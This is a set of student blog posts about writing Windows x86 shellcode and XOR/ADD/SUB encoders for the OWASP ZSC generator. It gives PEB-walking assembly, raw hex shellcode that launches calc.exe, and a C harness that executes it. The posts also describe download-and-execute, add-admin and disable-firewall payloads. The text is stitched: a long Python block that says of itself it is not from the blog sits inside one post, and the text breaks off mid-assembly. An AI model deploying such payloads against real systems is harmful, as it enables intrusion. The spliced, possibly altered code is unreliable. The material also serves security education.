Blog - Pratik Patel
<b>GSoC Work Submission</b> (2016-08-10)<div dir="ltr" style="text-align: left;" trbidi="on">
Hello,<br />
<br />
These are the direct links to all the work done during the GSoC period:<br />
PR link: <a href="https://github.com/zscproject/OWASP-ZSC/pulls?utf8=%E2%9C%93&q=is%3Apr%20is%3Aclosed%20author%3APratik151%20created%3A2016-05-23..2016-08-15">https://github.com/zscproject/OWASP-ZSC/pulls?utf8=%E2%9C%93&q=is%3Apr%20is%3Aclosed%20author%3APratik151%20created%3A2016-05-23..2016-08-15</a><br />
<br />
Commits link: <a href="https://github.com/zscproject/OWASP-ZSC/commits?author=Pratik151&page=1">https://github.com/zscproject/OWASP-ZSC/commits?author=Pratik151&page=1</a><br />
<br />
The first part of my project was writing Windows shellcode. It was a great part to learn from, as I didn't have much knowledge about shellcode before I started contributing to ZSC.<br />
<br />
At first I created the opcoder, which converts assembly code to opcodes - <a href="https://github.com/zscproject/OWASP-ZSC/blob/master/lib/opcoder/windows_x86.py">https://github.com/zscproject/OWASP-ZSC/blob/master/lib/opcoder/windows_x86.py</a><br />
<br />
Then I created the Windows Execute shellcode, which takes the name of the file to be executed as a parameter and generates the shellcode - <a href="https://github.com/zscproject/OWASP-ZSC/blob/master/lib/generator/windows_x86/exec.py">https://github.com/zscproject/OWASP-ZSC/blob/master/lib/generator/windows_x86/exec.py</a><br />
<br />
Next was the create directory shellcode - <a href="https://github.com/zscproject/OWASP-ZSC/blob/master/lib/generator/windows_x86/dir_create.py">https://github.com/zscproject/OWASP-ZSC/blob/master/lib/generator/windows_x86/dir_create.py</a><br />
<br />
The other shellcodes which were done are:<br />
Creating file - <a href="https://github.com/zscproject/OWASP-ZSC/pull/47">https://github.com/zscproject/OWASP-ZSC/pull/47</a><br />
Downloading file - <a href="https://github.com/zscproject/OWASP-ZSC/pull/48">https://github.com/zscproject/OWASP-ZSC/pull/48</a><br />
Download and Execute - <a href="https://github.com/zscproject/OWASP-ZSC/pull/49">https://github.com/zscproject/OWASP-ZSC/pull/49</a><br />
Add Admin - <a href="https://github.com/zscproject/OWASP-ZSC/pull/50">https://github.com/zscproject/OWASP-ZSC/pull/50</a><br />
Disable Firewall - <a href="https://github.com/zscproject/OWASP-ZSC/pull/51">https://github.com/zscproject/OWASP-ZSC/pull/51</a><br />
<br />
Next I started working on obfuscation modules. I created reverse hex and reverse base64 obfuscation modules for Ruby, Python, Perl, JavaScript and PHP. Here are the PRs:<br />
<a href="https://github.com/zscproject/OWASP-ZSC/pull/60">https://github.com/zscproject/OWASP-ZSC/pull/60</a><br />
<a href="https://github.com/zscproject/OWASP-ZSC/pull/62">https://github.com/zscproject/OWASP-ZSC/pull/62</a> <br />
<a href="https://github.com/zscproject/OWASP-ZSC/pull/63">https://github.com/zscproject/OWASP-ZSC/pull/63</a> <br />
<br />
I had planned to work on other obfuscation modules, but as the ZSC tool got accepted at DEFCON we had to complete the Windows shellcode part, as that was to be presented. There were no encoding modules for shellcode, but as they were needed to complete the Windows shellcode part, I started working on the encoding part.<br />
Here are the encoding modules that were created:<br />
Xor random - <a href="https://github.com/zscproject/OWASP-ZSC/pull/64">https://github.com/zscproject/OWASP-ZSC/pull/64</a> <a href="https://github.com/zscproject/OWASP-ZSC/pull/70">https://github.com/zscproject/OWASP-ZSC/pull/70</a><br />
Add random - <a href="https://github.com/zscproject/OWASP-ZSC/pull/73">https://github.com/zscproject/OWASP-ZSC/pull/73</a><br />
Sub random - <a href="https://github.com/zscproject/OWASP-ZSC/pull/78">https://github.com/zscproject/OWASP-ZSC/pull/78</a><br />
xor yourvalue - <a href="https://github.com/zscproject/OWASP-ZSC/pull/79">https://github.com/zscproject/OWASP-ZSC/pull/79</a><br />
inc and dec encodes - <a href="https://github.com/zscproject/OWASP-ZSC/pull/103/commits/e0364d3cda3b30caeabc06773586ec1914b96798">https://github.com/zscproject/OWASP-ZSC/pull/103/commits/e0364d3cda3b30caeabc06773586ec1914b96798</a><br />
inc yourvalue and dec yourvalue - <a href="https://github.com/zscproject/OWASP-ZSC/pull/103/commits/4c49c10c29506ea9e49df6fcdcec86b1c5d26ee2">https://github.com/zscproject/OWASP-ZSC/pull/103/commits/4c49c10c29506ea9e49df6fcdcec86b1c5d26ee2</a><br />
Add yourvalue and sub yourvalue - <a href="https://github.com/zscproject/OWASP-ZSC/pull/103/commits/61a5b2ff49c021bcb5b7bc65042547e71bf0a6d5">https://github.com/zscproject/OWASP-ZSC/pull/103/commits/61a5b2ff49c021bcb5b7bc65042547e71bf0a6d5</a><br />
<br />
After the encoding modules, as I didn't have much time to add a complex obfuscation module, I started working on a simple ASCII obfuscation module; here is the PR - <a href="https://github.com/zscproject/OWASP-ZSC/pull/103">https://github.com/zscproject/OWASP-ZSC/pull/103</a><br />
<br />
If you are interested in contributing or learning more about the tool, refer to the documentation: <a href="https://ali-razmjoo.gitbooks.io/owasp-zsc/content/">https://ali-razmjoo.gitbooks.io/owasp-zsc/content/</a><br />
<br />
It was a great experience to work on the ZSC tool, as I learned many things about exploits, shellcode etc. I would like to thank the OWASP organization and my mentors: Brian for helping me learn about shellcode and clearing my doubts, Johanna, who is a great leader doing everything she can for ZSC, and also Ali for helping me with the project, reviewing PRs and creating this tool :). GSoC will be ending but I will still be contributing to the ZSC tool. In the next couple of months ZSC will still be getting new changes, as it is likely to participate in Black Hat Arsenal EU (Johanna applied for it already) and we can add some new features to the tool. We also have a working API and OS X shellcode added to the tool. Thanks to <a href="https://github.com/CodeMaxx">Akash Trehan</a> for adding the OS X module. <br />
<br />
<br /></div>
<b>Shellcode Encoders and code obfuscation modules</b> (2016-07-20)<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
A lot has been added to the tool in the last 2-3 weeks; everyone is actively working on it. In my last post I had completed the download to file shellcode, and after that I added a couple of shellcodes like add admin and disable firewall. All the shellcodes in the tool can be seen <a href="https://github.com/zscproject/OWASP-ZSC/tree/master/lib/generator/windows_x86">here</a>.<br />
<br />
Then I worked on code obfuscation modules for some time. I added reverse hex and reverse base64 modules to the tool. <a href="https://github.com/zscproject/OWASP-ZSC/pull/60/files">Here</a> is the code for Python and JavaScript. The module was also developed for Perl and Ruby. I tested the modules for the different languages on both Python 2 and 3 and they worked correctly.<br />
<br />
As the org was selected for DEFCON 2016 we wanted to complete the Windows shellcode with encoders and also add OS X shellcode. So instead of starting on some complex obfuscation method I started working on encoders for Windows shellcode. I added <a href="https://github.com/zscproject/OWASP-ZSC/blob/master/lib/encoder/windows_x86/xor_random.py">xor_random</a>, <a href="https://github.com/zscproject/OWASP-ZSC/blob/master/lib/encoder/windows_x86/add_random.py">add_random</a>, <a href="https://github.com/zscproject/OWASP-ZSC/blob/master/lib/encoder/windows_x86/sub_random.py">sub_random</a> and <a href="https://github.com/zscproject/OWASP-ZSC/blob/master/lib/encoder/windows_x86/xor_yourvalue.py">xor_yourvalue</a>. I have also done add_yourvalue, but we are trying to fix <a href="https://github.com/zscproject/OWASP-ZSC/issues/80">this</a> issue before I add other encoders to the tool.<br />
<br />
All the PRs made by me can be found here, if you want to look at the code: <a href="https://github.com/zscproject/OWASP-ZSC/pulls?q=is%3Apr+is%3Aclosed+author%3APratik151">https://github.com/zscproject/OWASP-ZSC/pulls?q=is%3Apr+is%3Aclosed+author%3APratik151</a><br />
<br />
The ZSC tool now also has OS X shellcode, thanks to <a href="https://codemaxx.github.io/">Akash Trehan</a>, who added it to the tool. Also thanks to Ali, Brian and Johanna for helping me.<br />
<br /></div>
<b>GSoC project Status</b> (2016-06-21)<div dir="ltr" style="text-align: left;" trbidi="on">
Hello,<br />
<br />
I didn't make a post last week, so I will also be discussing the shellcodes which I did the previous week.<br />
<br />
I started working on the Create Directory shellcode in week 2 and completed it soon, as it wasn't big: I used the function <a href="https://msdn.microsoft.com/en-us/library/windows/desktop/aa363855(v=vs.85).aspx">CreateDirectoryA</a>, which is available in kernel32.dll, so there was no need to load any DLLs into the process.<br />
<br />
Then came the next shellcode, Creating File. I thought it would be straightforward: load the msvcrt.dll library > find fopen to create the file > find fprintf and use it to write to the file > close the file. But when I started to work on it fopen was not behaving as usual; it was changing the stack, so I was not able to get back values like the kernel32.dll address which I had saved on the stack for later use. I tried debugging it but couldn't find the cause, as fopen was giving some error values and calling _wfopen, and so the stack was changing. Using fopen the file was created, but the stack was not the same afterwards, so I couldn't get the values I had saved on it. I was still able to write code which exits successfully after creating the file, but it was getting long. So Ali told me about system(), which he used for the Linux create file shellcode. The system function is in msvcrt.dll, so I loaded it first and then, after finding its address, used it as system("echo data>file"). Here is the create file shellcode: <a href="https://github.com/Ali-Razmjoo/OWASP-ZSC/pull/47/files">https://github.com/Ali-Razmjoo/OWASP-ZSC/pull/47/files</a>. It takes two values, one is the file name and the other is the content of the file.<br />
<br />
Next I started working on the download file shellcode. This will be created as two shellcodes: 1. downloading a file 2. downloading and executing a file. I completed both of them; the PR for downloading a file is merged <a href="https://github.com/Ali-Razmjoo/OWASP-ZSC/pull/48">https://github.com/Ali-Razmjoo/OWASP-ZSC/pull/48 </a> and now I am pushing the download and execute shellcode. For downloading I used the <a href="https://msdn.microsoft.com/en-us/library/ms775123(v=vs.85).aspx">URLDownloadToFileA</a> function. The shellcode takes a URL and a filename as values. I spent one day on the execution part after completing the download part, and after a lot of debugging I found that I was making a mistake where I was passing parameters in the wrong order :P<br />
<br />
I am on schedule and next I will be working on creating a user and adding it to the admin group. I will be using the NetUserAdd method or do this part through a command, whichever is shorter. <br />
<br />
</div>
<b>GSoC Week 2 : Opcoder and Windows Shellcode</b> (2016-06-07)<div dir="ltr" style="text-align: left;" trbidi="on">
Hello,<br />
<br />
I completed the 2nd week of GSoC and it was a good one :)<br />
<br />
This week I made the opcoder that converts assembly code to opcodes. I worked mostly with the tool, adding the Windows options to it and so on. It was made easy by Ali's great tutorial here: <a href="https://ali-razmjoo.gitbooks.io/owasp-zsc/content/English/developers_s1.html">https://ali-razmjoo.gitbooks.io/owasp-zsc/content/English/developers_s1.html</a>. The second thing I did was converting the static shellcode for calc.exe to a dynamic one, so that it can execute any file. First I started by writing that myself and spent a day on it, and then I came across the <a href="https://github.com/Ali-Razmjoo/OWASP-ZSC/blob/master/core/stack.py#L26">generate</a> function already in the tool which does the same thing, so I used that for the opcoder. I didn't interact daily with my mentor Brian this week as I was able to do most of my work on my own, but I interacted with Ali many times as I had questions about the tool. Whenever I ask Brian or Ali about any doubts they reply very fast, even though they are busy with their jobs. It is good to have such active mentors :). Here are a couple of screenshots from the tool of the options and the shellcode generated.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjpIgpAEzxy0ANfpptQaRiXtvaEKjJluXjW7dFL5xCmFijus82uS1KyrOuGAXG3JkXHigU3dSiax5p-5Qdyz7UdKcDKN34lUAqfoQ70jQSNqvgXn6eI_HmmlGD9EtXtUgiJyTPk3sZJpE8/s1600/bec3bdc3-2e5e-4717-b364-54b1eea428a6.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="220" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjpIgpAEzxy0ANfpptQaRiXtvaEKjJluXjW7dFL5xCmFijus82uS1KyrOuGAXG3JkXHigU3dSiax5p-5Qdyz7UdKcDKN34lUAqfoQ70jQSNqvgXn6eI_HmmlGD9EtXtUgiJyTPk3sZJpE8/s320/bec3bdc3-2e5e-4717-b364-54b1eea428a6.jpg" width="320" /></a></div>
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgZbCRLK8Z5exj1uE-q3Omn0b_Pv5oIqIEZC6gM8mLHzyb90zkwUCcDx0ioCc6pUDM5rd1XK5kFTWW_cxE-_vZggctlfsQZdhwtYpO2-0vgIbGnJH9MZyFTUyosELX5K79PH1f_zPClQ5I/s1600/f4d62600-6556-4284-8768-267eadbcf6a6.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="257" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgZbCRLK8Z5exj1uE-q3Omn0b_Pv5oIqIEZC6gM8mLHzyb90zkwUCcDx0ioCc6pUDM5rd1XK5kFTWW_cxE-_vZggctlfsQZdhwtYpO2-0vgIbGnJH9MZyFTUyosELX5K79PH1f_zPClQ5I/s320/f4d62600-6556-4284-8768-267eadbcf6a6.jpg" width="320" /> </a> </div>
<div class="separator" style="clear: both; text-align: center;">
(Ignore the line-by-line opcodes in the 2nd screenshot; that was a print statement :P)</div>
<div class="separator" style="clear: both; text-align: center;">
I have pushed the changes to the main repo here: <a href="https://github.com/Ali-Razmjoo/OWASP-ZSC/pull/46/files">https://github.com/Ali-Razmjoo/OWASP-ZSC/pull/46/files</a>. I feel that the opcoder is messy currently, but I will document it when I have all the shellcode covered, as with the other shellcodes coming I think it will change a lot in the coming weeks.</div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
I started the create directory shellcode yesterday. It was planned to start at the end of week 2 but started in week 3. So to keep to the schedule, this week I should complete the Create Directory and Write to File shellcodes. I have almost completed the create directory shellcode, as it uses the function CreateDirectory which is already in kernel32.dll, so I hope the remaining time will be enough to complete the file shellcode, which is slightly more complicated as it requires functions like fopen and fwrite which are in another DLL that needs to be loaded into the process.</div>
</div>
<b>Windows Shellcode for executing file - Week 1</b> (2016-05-28)<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="tr_bq">
Hello,</div>
<br />
It's time for a blog post :). This week was a good learning experience. In the last couple of posts I forgot to thank my mentors for helping me :P. Thank you Brian, Johanna and Ali for accepting me to the project.<br />
<br />
This week I learned a lot about the shellcode part. My mentor Brian was helping me with all my doubts. Whenever I had a doubt, even a small one, and couldn't understand it after googling for some time, I used to ask Brian and he was very helpful. He is always responsive and gives the best descriptive answers. So first I started by learning about shellcode in general from <a href="http://as.wiley.com/WileyCDA/WileyTitle/productCd-047008023X.html">The Shellcoder's Handbook</a> and some other resources. I learned about Linux shellcode first and it was a good one. When I switched to the Windows shellcode part, everything was different. It took some time to slowly understand everything. After reading a lot of tutorials, papers and shellcodes I was able to write a WinExec shellcode that spawns calc. It was an amazing moment when calc spawned without any segfaults :).<br />
<br />
The problem with writing shellcode for Windows is that the base address of kernel32.dll changes from version to version of Windows, so we can't hardcode the address of kernel32.dll. So the things we have to do to write Windows shellcode are:<br />
<br />
1. Find the kernel32.dll base address using the Process Environment Block (PEB).<br />
2. Parse its export table to locate GetProcAddress.<br />
3. Use GetProcAddress to locate LoadLibrary.<br />
4. Use LoadLibrary to load other DLLs into the current address space.<br />
5. Then again use GetProcAddress to locate the other functions the shellcode needs.<br />
<br />
For the Execute shellcode we will require the WinExec function, which is in kernel32.dll. So first we have to find kernel32.dll, then find GetProcAddress, use GetProcAddress to find the address of WinExec, call WinExec, and to exit we use the ExitProcess function, which is also in kernel32.dll. So for this shellcode we don't need to load any other DLLs.<br />
<br />
First we have to find the kernel32.dll base address. As described in skape's paper and some others, we can use the PEB method to get the kernel32.dll base address like this:<br />
<blockquote class="tr_bq">
xor ecx, ecx<br />
mov eax, [fs:ecx + 0x30] ; GET PEB<br />
mov eax, [eax + 0xc] ; PEB->Ldr<br />
mov esi, [eax + 0x14] ; PEB->Ldr.InMemOrder<br />
lodsd ; Second module<br />
xchg eax, esi<br />
lodsd ; Third module(kernel)<br />
mov ebx, [eax + 0x10] ; base address of kernel32.dll</blockquote>
Now we have to find the offset of GetProcAddress. Export offsets differ between kernel32.dll builds, so GetProcAddress is not at the same offset in every kernel32.dll and we have to look it up through the export directory, as described in the <a href="http://www.hick.org/code/skape/papers/win32-shellcode.pdf">skape paper</a>. After the following block, EDX points at the export directory and ESI at its table of exported function names.<br />
<blockquote class="tr_bq">
mov edx, [ebx + 0x3c] ; DOS->e_lfanew<br />
add edx, ebx ; PE Header<br />
mov edx, [edx + 0x78] ; Offset export table<br />
add edx, ebx ; Export table<br />
mov esi, [edx + 0x20] ; Offset names table<br />
add esi, ebx ; Names table</blockquote>
Now we find GetProcAddress, which we will then use to find the addresses of the other functions. I read about this method of finding GetProcAddress by comparing names in the securitycafe tutorial on Windows shellcode; it compares the function names dword by dword. There is another method using hashes which Brian mentioned, and I will try to learn that too. Here is how we get GetProcAddress:<br />
<blockquote class="tr_bq">
xor ecx, ecx <br />
Get_Function:<br />
inc ecx ; Increment the name index (after a match ECX is one past it)<br />
lodsd ; Get name offset<br />
add eax, ebx ; Get function name<br />
cmp dword [eax], 0x50746547 ; GetP<br />
jnz Get_Function<br />
cmp dword [eax + 0x4], 0x41636f72 ; rocA<br />
jnz Get_Function<br />
cmp dword [eax + 0x8], 0x65726464 ; ddre<br />
jnz Get_Function<br />
dec ecx ; ECX = index of the matching name; the ordinal table is parallel to the name table, so read it at this index<br />
mov esi, [edx + 0x24] ; ESI = Offset ordinals<br />
add esi, ebx ; ESI = Ordinals table<br />
mov cx, [esi + ecx * 2] ; CX = unbiased ordinal = index into the address table<br />
mov esi, [edx + 0x1c] ; ESI = Offset address table<br />
add esi, ebx ; ESI = Address table<br />
mov edx, [esi + ecx * 4] ; EDX = Pointer(offset)<br />
add edx, ebx ; EDX = GetProcAddress</blockquote>
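The same export-directory walk in Python, as an added example that is not code from this blog or from OWASP ZSC: it parses a constructed minimal image (not a real kernel32.dll, and 0x7c800000 is an assumed base address) using the header offsets the assembly above uses, and also shows what comes out when the ordinal table is read one entry past the matching name index instead of at it.

```python
import struct

# Header and IMAGE_EXPORT_DIRECTORY field offsets: the same constants the assembly uses.
E_LFANEW = 0x3c               # DOS header -> offset of the PE header
EXPORT_DIR_ENTRY = 0x78       # PE header -> DataDirectory[0].VirtualAddress (export table)
NUMBER_OF_NAMES = 0x18
ADDRESS_OF_FUNCTIONS = 0x1c
ADDRESS_OF_NAMES = 0x20
ADDRESS_OF_NAME_ORDINALS = 0x24


def u32(buf, off):
    return struct.unpack_from("<I", buf, off)[0]


def u16(buf, off):
    return struct.unpack_from("<H", buf, off)[0]


def cstring(buf, off):
    return buf[off:buf.index(b"\x00", off)].decode("ascii")


def dword_tags(name):
    """Little-endian dword constants for a 'cmp dword [eax + N], imm32' chain,
    e.g. 'GetProcAddress' -> [0x50746547, 0x41636f72, 0x65726464] ("GetP", "rocA", "ddre")."""
    raw = name.encode("ascii")
    return [u32(raw, off) for off in range(0, len(raw) - len(raw) % 4, 4)]


def resolve_export(img, base, name, prefix_len=None, as_in_listing=False):
    """Resolve an export the way the shellcode does: DOS header -> PE header ->
    export directory, scan the name table, map the matching name index through
    the ordinal table, index the address table. Returns a VA or None.

    prefix_len: compare only the first N bytes, like a 12-byte cmp chain.
    as_in_listing: use a counter that is one past the name index and decrement
    it after the ordinal read. That is only right when the neighbouring entry's
    ordinal happens to be one higher (ordinals numbered in name order); the
    ordinal table is parallel to the name table and must be read at the index itself.
    """
    pe = u32(img, E_LFANEW)
    exp = u32(img, pe + EXPORT_DIR_ENTRY)
    funcs = u32(img, exp + ADDRESS_OF_FUNCTIONS)
    names = u32(img, exp + ADDRESS_OF_NAMES)
    ordinals = u32(img, exp + ADDRESS_OF_NAME_ORDINALS)
    want = name if prefix_len is None else name[:prefix_len]
    for i in range(u32(img, exp + NUMBER_OF_NAMES)):
        got = cstring(img, u32(img, names + 4 * i))
        if (got if prefix_len is None else got[:prefix_len]) != want:
            continue
        if as_in_listing:
            ordinal = u16(img, ordinals + 2 * (i + 1)) - 1
        else:
            ordinal = u16(img, ordinals + 2 * i)
        return base + u32(img, funcs + 4 * ordinal)
    return None


def build_sample_image():
    """Constructed sample, not a real DLL: a minimal image with just the pieces the
    walk touches. Names are sorted as in a real export directory, but the ordinals
    are deliberately not in name order, which the PE format allows."""
    PE_HDR, EXP_DIR, FUNCS, NAMES, ORDS, STRS = 0x80, 0x100, 0x140, 0x160, 0x180, 0x1a0
    # export address table, indexed by unbiased ordinal
    func_rvas = [0x2000, 0x2300, 0x2100, 0x2200]   # WinExec, GetProcAddressForCaller, ExitProcess, GetProcAddress
    names = ["ExitProcess", "GetProcAddress", "GetProcAddressForCaller", "WinExec"]
    ordinals = [2, 3, 1, 0]                        # parallel to names
    img = bytearray(0x300)
    img[0:2] = b"MZ"
    struct.pack_into("<I", img, E_LFANEW, PE_HDR)
    img[PE_HDR:PE_HDR + 4] = b"PE\x00\x00"
    struct.pack_into("<I", img, PE_HDR + EXPORT_DIR_ENTRY, EXP_DIR)
    # NumberOfFunctions, NumberOfNames, AddressOfFunctions, AddressOfNames, AddressOfNameOrdinals
    struct.pack_into("<IIIII", img, EXP_DIR + 0x14, len(func_rvas), len(names), FUNCS, NAMES, ORDS)
    for i, rva in enumerate(func_rvas):
        struct.pack_into("<I", img, FUNCS + 4 * i, rva)
    cursor = STRS
    for i, (nm, ordinal) in enumerate(zip(names, ordinals)):
        struct.pack_into("<I", img, NAMES + 4 * i, cursor)
        struct.pack_into("<H", img, ORDS + 2 * i, ordinal)
        raw = nm.encode("ascii") + b"\x00"
        img[cursor:cursor + len(raw)] = raw
        cursor += len(raw)
    return bytes(img)


if __name__ == "__main__":
    image, base = build_sample_image(), 0x7c800000   # assumed base, not a real kernel32 address
    for fn in ("GetProcAddress", "WinExec", "ExitProcess"):
        print(f"{fn:16s} {resolve_export(image, base, fn):#010x}")
    print("one past the name index:", hex(resolve_export(image, base, "GetProcAddress", as_in_listing=True)))
```

With prefix_len=12 the lookup still lands on GetProcAddress rather than GetProcAddressForCaller only because the name table is sorted and the shorter name comes first, which is the property a 12-byte compare chain silently relies on.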
Now we have GetProcAddress and we will use that to find WinExec function address.<br />
<blockquote class="tr_bq">
push ebx ; kernel32.dll base address (saved for later)<br />
push edx ; GetProcAddress address (saved for later)<br />
xor ecx, ecx<br />
push ecx ; null terminator<br />
mov ecx, 0x61636578 ; "xeca"; the 'a' will be turned into null<br />
push ecx<br />
sub dword [esp + 0x3], 0x61 ; turn the 'a' into null<br />
push 0x456e6957 ; "WinE"<br />
push esp ; pointer to "WinExec\0"<br />
push ebx ; kernel32.dll base address<br />
call edx ; GetProcAddress(kernel32.dll, "WinExec")</blockquote>
Now eax holds the address of WinExec (the call's return value), and we can use it to execute the file. <a href="https://msdn.microsoft.com/en-us/library/windows/desktop/ms687393(v=vs.85).aspx">WinExec </a>takes two parameters, the command line and a show flag; we build the "calc.exe" string on the stack, keep its pointer in ebx, and push the flag and the pointer:<br />
<blockquote class="tr_bq">
add esp, 0x8 ; Move stack to 8 bytes so string "WinExec\0" will be removed<br />
pop ecx<br />
push eax ; eax contains WinExec address<br />
xor ecx, ecx<br />
push ecx <br />
push 0x6578652e ; .exe hex value<br />
push 0x636c6163 ;calc hex value<br />
xor ebx, ebx <br />
mov ebx, esp ;save pointer to string in ebx<br />
xor ecx, ecx<br />
push ecx<br />
push ebx ; push pointer to string calc.exe<br />
call eax ; WinExec("calc.exe",0)</blockquote>
OK, now we have spawned calc and we need to exit. For that we use GetProcAddress again to find the address of ExitProcess and call ExitProcess(0):<br />
<blockquote class="tr_bq">
add esp, 0x10 ; skip 16 bytes of stack: "calc.exe", 0, WinExec address<br />
pop edx ; GetProcAddress address<br />
pop ebx ;kernel32.dll address<br />
xor ecx, ecx<br />
mov ecx, 0x61737365 ; essa<br />
push ecx<br />
sub dword [esp + 0x3], 0x61 ; "a" will be now null<br />
push 0x636f7250 ; Proc<br />
push 0x74697845 ; Exit<br />
push esp ;pointer to string<br />
push ebx ; kernel32.dll base address<br />
call edx ; GetProcAddress(kernel32.dll, ExitProcess)<br />
xor ecx, ecx ;<br />
push ecx ; 0<br />
call eax ; ExitProcess(0)</blockquote>
<br />
So that's it. I tested this shellcode on Windows XP and 8.1. I think I can still reduce a few bytes, as I see that I saved some addresses on the stack, like the one for WinExec, but didn't use them later. Here is the code with the shellcode in Visual Studio to test it:<br />
<blockquote>
#include <Windows.h><br />
#include <stdio.h><br />
#include <string.h><br />
int main()<br />
{<br />
    /* the GetProcAddress lookup in these bytes reads the ordinal table at the matching name index (dec ecx before mov cx) */<br />
    unsigned char shellcode[] = "\x31\xc9\x64\x8b\x41\x30\x8b\x40\x0c\x8b\x70\x14\xad\x96\xad\x8b\x58"<br />
    "\x10\x8b\x53\x3c\x01\xda\x8b\x52\x78\x01\xda\x8b\x72\x20\x01\xde\x31\xc9\x41\xad\x01\xd8\x81"<br />
    "\x38\x47\x65\x74\x50\x75\xf4\x81\x78\x04\x72\x6f\x63\x41\x75\xeb\x81\x78\x08\x64\x64\x72\x65"<br />
    "\x75\xe2\x49\x8b\x72\x24\x01\xde\x66\x8b\x0c\x4e\x8b\x72\x1c\x01\xde\x8b\x14\x8e\x01\xda\x31"<br />
    "\xc9\x53\x52\x51\xb9\x78\x65\x63\x61\x51\x83\x6c\x24\x03\x61\x68\x57\x69\x6e\x45\x54\x53\xff"<br />
    "\xd2\x83\xc4\x08\x59\x50\x31\xc9\x51\x68\x2e\x65\x78\x65\x68\x63\x61\x6c\x63\x31\xdb\x89\xe3"<br />
    "\x31\xc9\x51\x53\xff\xd0\x83\xc4\x10\x5a\x5b\x31\xc9\xb9\x65\x73\x73\x61\x51\x83\x6c\x24\x03"<br />
    "\x61\x68\x50\x72\x6f\x63\x68\x45\x78\x69\x74\x54\x53\xff\xd2\x31\xc9\x51\xff\xd0";<br />
    printf("Executing Shellcode...\n");<br />
    /* the buffer needs an executable page; jumping into a plain array faults under DEP */<br />
    void *page = VirtualAlloc(NULL, sizeof(shellcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);<br />
    if (page == NULL) {<br />
        printf("VirtualAlloc failed: %lu\n", GetLastError());<br />
        return 1;<br />
    }<br />
    memcpy(page, shellcode, sizeof(shellcode));<br />
    ((void(*)())page)();<br />
    return 0;<br />
}</blockquote>
<br />
I have to make this shellcode work so that it can execute any file, not only calc.exe. I will discuss that with Brian and implement it. I also have to write the opcoder now; as I have the code, I can write the opcoder and test it. Brian and I are thinking of using some libraries, but I have to test the library with the shellcode, see if it works, and discuss with Ali whether we can use that library in the tool.<br />
<br />
P.S : Today is my Birthday :)<br />
<br />
Thanks for reading. Have a Good day :)</div>
<b>Some details about Windows Shellcode part of GSoC project</b> (2016-05-18)<div dir="ltr" style="text-align: left;" trbidi="on">
I completed my final exams and now it's time to focus on the GSoC project :).<br />
<br />
<br />
In my last blog post I posted the timeline from my proposal; in this post I will add details about the shellcode part of the project, which I will be completing before the mid-term evaluation if everything goes as planned.<br />
<br />
<b>Shellcode for Windows</b><br />
<br />
On Windows there is no direct kernel interface like int 0x80. Windows provides kernel32.dll, but its functions are not loaded at the same address across Windows versions, so hardcoded addresses are hard to use in shellcode. The <a href="http://www.hick.org/code/skape/papers/win32-shellcode.pdf">Skape paper</a> on Windows shellcode describes how we can find the address of a function using the PEB. I am not going to repeat the details from the paper here; in summary it goes like this:<br />
<br />
1. Find the kernel32.dll base address using the Process Environment Block (PEB)<br />
2. Parse its export table to locate GetProcAddress<br />
3. Use GetProcAddress to locate LoadLibrary<br />
4. Use LoadLibrary to load other DLLs into the current address space<br />
5. Then again use GetProcAddress to locate the other functions the shellcode needs.<br />
<br />
<br />
There is another way we can do this: by hardcoding the addresses, but finding the addresses of the functions dynamically using Python ctypes.<br />
Something like this to get the address of a function:<br />
<blockquote class="tr_bq">
import ctypes<br />
dll = u'kernel32.dll'<br />
module = b'WinExec'  # GetProcAddress takes a narrow (char*) name, so pass bytes on Python 3<br />
kernel32 = ctypes.windll.kernel32<br />
kernel32.LoadLibraryW.restype = ctypes.c_void_p  # keep full pointers on 64-bit Python<br />
kernel32.GetProcAddress.argtypes = [ctypes.c_void_p, ctypes.c_char_p]<br />
kernel32.GetProcAddress.restype = ctypes.c_void_p<br />
handle = kernel32.LoadLibraryW(dll)<br />
address = kernel32.GetProcAddress(handle, module)  # only meaningful for a target process of the same bitness with kernel32 at the same base</blockquote>
<br />
Here is a script that I wrote some time back to generate asm code that executes cmd.exe using the functions WinExec and ExitProcess - <a href="https://gist.github.com/Pratik151/58fd921116ce314d796b">https://gist.github.com/Pratik151/58fd921116ce314d796b</a><br />
<br />
Here is a rough timeline of what I am planning to do:<br />
<br />
<b>Week 1 and Week 2 (May 23 - June 5) </b><br />
Add an opcoder for Windows like this one for Linux - <a href="https://github.com/Ali-Razmjoo/OWASP-ZSC/blob/master/lib/opcoder/linux_x86.py">https://github.com/Ali-Razmjoo/OWASP-ZSC/blob/master/lib/opcoder/linux_x86.py</a><br />
Add Execute shellcode - it requires two functions, WinExec and ExitProcess<br />
Start the Write to file shellcode - it requires fopen, fclose and ExitProcess<br />
<br />
If I am able to get the function addresses dynamically using ctypes and it works, then I think the shellcode can be developed ahead of time. But if that doesn't work then I will have to use the PEB method to get the addresses of the required functions.<br />
<br />
<b>Week 3 (June 6 - June 12)</b><br />
Complete the Write to file shellcode if it is not completed yet.<br />
Add the Create directory shellcode. If I complete it early I can start on next week's work, or if more time is left I can start another new shellcode.<br />
<br />
<b>Week 4 &amp; Week 5 (June 13 - June 26)</b><br />
Add the Download and Execute a file shellcode - this requires the URLDownloadToFile function, which is in Urlmon.dll. But Urlmon.dll is not loaded in the process when it starts, so we need to load the DLL into the process first, and only then can we use URLDownloadToFile. So we have to load Urlmon.dll into the process using LoadLibrary. We can first find the address of LoadLibrary dynamically using ctypes, then load Urlmon.dll with it and call URLDownloadToFile. The DLL can be loaded something like this:<br />
<br />
<blockquote class="tr_bq">
GetUrlmonLibrary:<br />
    call LoadUrlmon<br />
    db 'Urlmon.dllN' ; N will be replaced with a null character<br />
LoadUrlmon:<br />
    pop ecx ; get the address of the 'Urlmon.dllN' string<br />
    xor edx, edx ; DL must be zero before it is written as the terminator<br />
